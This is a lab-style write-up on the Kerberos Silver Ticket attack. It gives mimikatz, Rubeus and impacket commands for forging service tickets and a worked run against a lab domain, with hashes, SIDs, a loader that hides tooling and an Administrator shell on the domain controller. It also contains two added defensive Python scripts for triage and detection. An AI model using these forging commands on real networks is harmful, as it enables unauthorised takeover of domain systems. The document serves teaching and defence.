Silver Ticket

Unlike a Golden Ticket, where we forge a TGT using the krbtgt hash, a Silver Ticket attack forges a TGS (service ticket) for a specific service without needing to compromise the KDC or the krbtgt account. We only need the NTLM hash (or Kerberos key) of the service account.

Silver Ticket

In a Silver Ticket attack, we forge the TGS to gain access to a service without needing to compromise a domain controller.

  • We first compromise a service account by obtaining its NTLM hash or Kerberos key.

  • Forge the TGS using Mimikatz.

  • Use the forged TGS to authenticate to the specific service as the compromised account.

  • Unlike a Golden Ticket, which is a TGT that must be presented to the DC, a Silver Ticket is presented directly to the service, so the attack does not require any interaction with the DC, making it stealthier.

  • Note: a Golden Ticket provides access to any service on any machine, whereas a Silver Ticket only provides access to a particular service on a particular machine. A Golden Ticket could last 6 months, whereas a Silver Ticket expires in 30 days.
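The bullets above reduce the precondition to one fact: the service account's NTLM hash (or AES key) is the only secret needed, and a ticket forged from a machine key is bounded by the 30-day machine-account rotation. The following is an added example, not part of the original notes, that turns that into a defender's triage: for each SPN-bearing account it reports whether RC4 (NTLM-derived) keys are still accepted and how old the key is. The directory records are constructed and the attribute names follow the AD schema (`servicePrincipalName`, `msDS-SupportedEncryptionTypes`, `pwdLastSet`); treating an unset encryption-type attribute as RC4-capable is an assumption stated in the code.

```python
"""
Added example, not part of the original notes: triage of which accounts a
Silver Ticket forge could be built against. The forge only needs the service
account's NTLM hash (/rc4) or AES key, so the defensive questions are which
accounts carry an SPN, whether they still accept RC4 (NTLM-derived) keys, and
how long since the key was rotated. The 30-day default is the machine-account
rotation interval, which is what bounds a ticket forged from a machine key.
The records below are constructed; attribute names follow the AD schema, but
no directory is queried.
"""
from datetime import datetime, timedelta, timezone

# Bit flags of msDS-SupportedEncryptionTypes.
DES_CBC_CRC, DES_CBC_MD5, RC4_HMAC, AES128_CTS, AES256_CTS = 0x1, 0x2, 0x4, 0x8, 0x10

# pwdLastSet is a FILETIME: 100 ns ticks since 1601-01-01 UTC.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


def rc4_allowed(enc_types: int) -> bool:
    """True when the account's Kerberos keys include RC4-HMAC, so the NTLM hash
    alone is enough to forge a ticket. Assumption: an unset (0) value is treated
    as RC4-capable, the conservative reading of the domain default."""
    return True if not enc_types else bool(enc_types & RC4_HMAC)


def triage(records, now: datetime, max_key_age_days: int = 30):
    """One finding per SPN-bearing account, highest risk first."""
    findings = []
    for rec in records:
        if not rec.get("servicePrincipalName"):
            continue  # no SPN: the KDC issues no service tickets for it, out of scope
        age = (now - filetime_to_datetime(rec["pwdLastSet"])).days
        rc4 = rc4_allowed(rec.get("msDS-SupportedEncryptionTypes", 0))
        stale = age > max_key_age_days
        risk = "high" if rc4 and stale else "medium" if rc4 or stale else "low"
        findings.append({"account": rec["sAMAccountName"],
                         "spns": list(rec["servicePrincipalName"]),
                         "rc4_allowed": rc4, "key_age_days": age, "risk": risk})
    rank = {"high": 0, "medium": 1, "low": 2}
    return sorted(findings, key=lambda f: (rank[f["risk"]], f["account"]))


NOW = datetime(2024, 6, 1, tzinfo=timezone.utc)

SAMPLE_RECORDS = [  # constructed directory records
    {"sAMAccountName": "dcorp-dc$",
     "servicePrincipalName": ["HOST/dcorp-dc.dollarcorp.moneycorp.local", "HOST/DCORP-DC"],
     "msDS-SupportedEncryptionTypes": RC4_HMAC | AES128_CTS | AES256_CTS,
     "pwdLastSet": datetime_to_filetime(NOW - timedelta(days=12))},
    {"sAMAccountName": "svc_sql",
     "servicePrincipalName": ["MSSQLSvc/dcorp-sql.dollarcorp.moneycorp.local:1433"],
     # attribute unset: stays on RC4; password last changed over two years ago
     "pwdLastSet": datetime_to_filetime(NOW - timedelta(days=800))},
    {"sAMAccountName": "svc_web",
     "servicePrincipalName": ["http/dcorp-web.dollarcorp.moneycorp.local"],
     "msDS-SupportedEncryptionTypes": AES128_CTS | AES256_CTS,
     "pwdLastSet": datetime_to_filetime(NOW - timedelta(days=20))},
    {"sAMAccountName": "jdoe", "servicePrincipalName": [],
     "pwdLastSet": datetime_to_filetime(NOW - timedelta(days=400))},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS, NOW):
        print(f"{f['risk']:6} {f['account']:10} rc4={f['rc4_allowed']} "
              f"key_age={f['key_age_days']}d {f['spns']}")
```

On the constructed data the stale, RC4-capable `svc_sql` ranks first, the DC machine account (RC4 still enabled but rotated within 30 days) is medium, and the AES-only, recently rotated `svc_web` is low. Accounts without an SPN are skipped because no service ticket is ever issued to them, so a forged one buys nothing.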

Windows:

# Create the ticket (mimikatz has no separate silver module: kerberos::golden with /service and /target forges a service ticket; it is saved as ticket.kirbi unless /ticket:<FILE> or /ptt is given)
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"

# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd

Linux:

python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>

export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache 

python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass

Attack in Practice:

When we have the DC/DA hash (here, the NTLM or AES hash of the dcorp-dc machine account), we can create a Silver Ticket that provides access to a service on the DC. Once the ticket is imported, we can get a shell on the DC.

# ArgSplit for "silver"
# Use the NTLM or AES hash of dcorp-dc to forge and import ticket:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:4f12be987e9c7419573902752a927164 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

# Similarly for WMI using BetterSafetyKatz.exe
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:c6a60b67476b36ad7838d7875c33c2c3 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

# A similar command can be used for any other service on a machine. Which services? HOST, RPCSS, HTTP and many more.

# With the ticket imported, we can get a shell on the DC and execute commands.

C:\AD\Tools>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd
Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator>set username
set username
USERNAME=Administrator

C:\Users\Administrator>set computername
set computername
COMPUTERNAME=DCORP-DC
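The winrs session above lands on dcorp-dc as a Kerberos network logon, but the KDC never issued the ticket, which is exactly the "no interaction with the DC" property the notes rely on. The following is an added example, not part of the original notes, showing how a defender can use that property: event 4769 is logged on the DC only for service tickets the KDC actually issued, so a 4624 (LogonType 3, Kerberos) on a host with no 4769 for that user and that host's machine account within the ticket lifetime is consistent with a forged service ticket (or with a gap in DC log collection, which the finding should say). This holds when the target is the DC itself, as here. A second, weaker heuristic flags a 4624 whose TargetDomainName is in DNS form instead of NetBIOS form, an artefact documented for older forging tools. All event records, IP addresses and timestamps are constructed; field names follow the Windows event XML.

```python
"""
Added example, not part of the original notes: correlate Kerberos network
logons on a host (4624) against service-ticket issuance on the DC (4769). A
forged service ticket produces the first without the second. The events below
are constructed to resemble parsed Windows Security events.
"""
from datetime import datetime, timedelta


def ts(stamp: str) -> datetime:
    return datetime.fromisoformat(stamp)


DC = "dcorp-dc.dollarcorp.moneycorp.local"

SAMPLE_EVENTS = [
    # Legitimate: the KDC issues jdoe a service ticket for DCORP-DC$, then jdoe logs on.
    {"EventID": 4769, "Computer": DC, "TimeCreated": ts("2024-06-01T09:00:00"),
     "TargetUserName": "jdoe@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "DCORP-DC$", "Status": "0x0"},
    {"EventID": 4624, "Computer": DC, "TimeCreated": ts("2024-06-01T09:01:00"),
     "TargetUserName": "jdoe", "TargetDomainName": "DOLLARCORP", "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "IpAddress": "172.16.2.10"},
    # Suspicious: a Kerberos logon as Administrator for which the KDC never issued a ticket.
    {"EventID": 4624, "Computer": DC, "TimeCreated": ts("2024-06-01T10:15:00"),
     "TargetUserName": "Administrator", "TargetDomainName": "dollarcorp.moneycorp.local",
     "LogonType": 3, "AuthenticationPackageName": "Kerberos", "IpAddress": "172.16.2.50"},
    # NTLM logon: outside the scope of this check.
    {"EventID": 4624, "Computer": DC, "TimeCreated": ts("2024-06-01T10:20:00"),
     "TargetUserName": "backup", "TargetDomainName": "DOLLARCORP", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "IpAddress": "172.16.2.20"},
]


def host_account(computer: str) -> str:
    """Machine account that 4769 names as ServiceName for a host's HOST/CIFS/HTTP SPNs."""
    return computer.split(".")[0].upper() + "$"


def find_unissued_kerberos_logons(events, max_ticket_age=timedelta(hours=10)):
    """Flag Kerberos network logons with no preceding successful 4769 for the same
    user and host account within max_ticket_age (default: the usual 10-hour ticket life)."""
    issued = [e for e in events if e["EventID"] == 4769 and e.get("Status") == "0x0"]
    findings = []
    for e in events:
        if (e["EventID"] != 4624 or e["LogonType"] != 3
                or e["AuthenticationPackageName"] != "Kerberos"):
            continue
        user = e["TargetUserName"].lower()
        service = host_account(e["Computer"])
        matched = any(
            t["TargetUserName"].split("@")[0].lower() == user
            and t["ServiceName"].upper() == service
            and timedelta(0) <= e["TimeCreated"] - t["TimeCreated"] <= max_ticket_age
            for t in issued)
        reasons = []
        if not matched:
            reasons.append("no 4769 on the DC for this user and host within ticket lifetime "
                           "(forged ticket, or DC log coverage gap)")
        if "." in e["TargetDomainName"]:
            reasons.append("TargetDomainName in DNS form rather than NetBIOS form")
        if reasons:
            findings.append({"host": e["Computer"], "user": e["TargetUserName"],
                             "source": e["IpAddress"], "time": e["TimeCreated"],
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_unissued_kerberos_logons(SAMPLE_EVENTS):
        print(f"{f['time']} {f['host']} {f['user']} from {f['source']}: {'; '.join(f['reasons'])}")
```

Only the Administrator logon is reported, with both reasons; the jdoe logon has a matching 4769 one minute earlier and the NTLM logon is out of scope. The correlation needs 4769 from every DC that could have issued the ticket, so the finding text keeps the log-coverage caveat rather than asserting a forgery outright.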
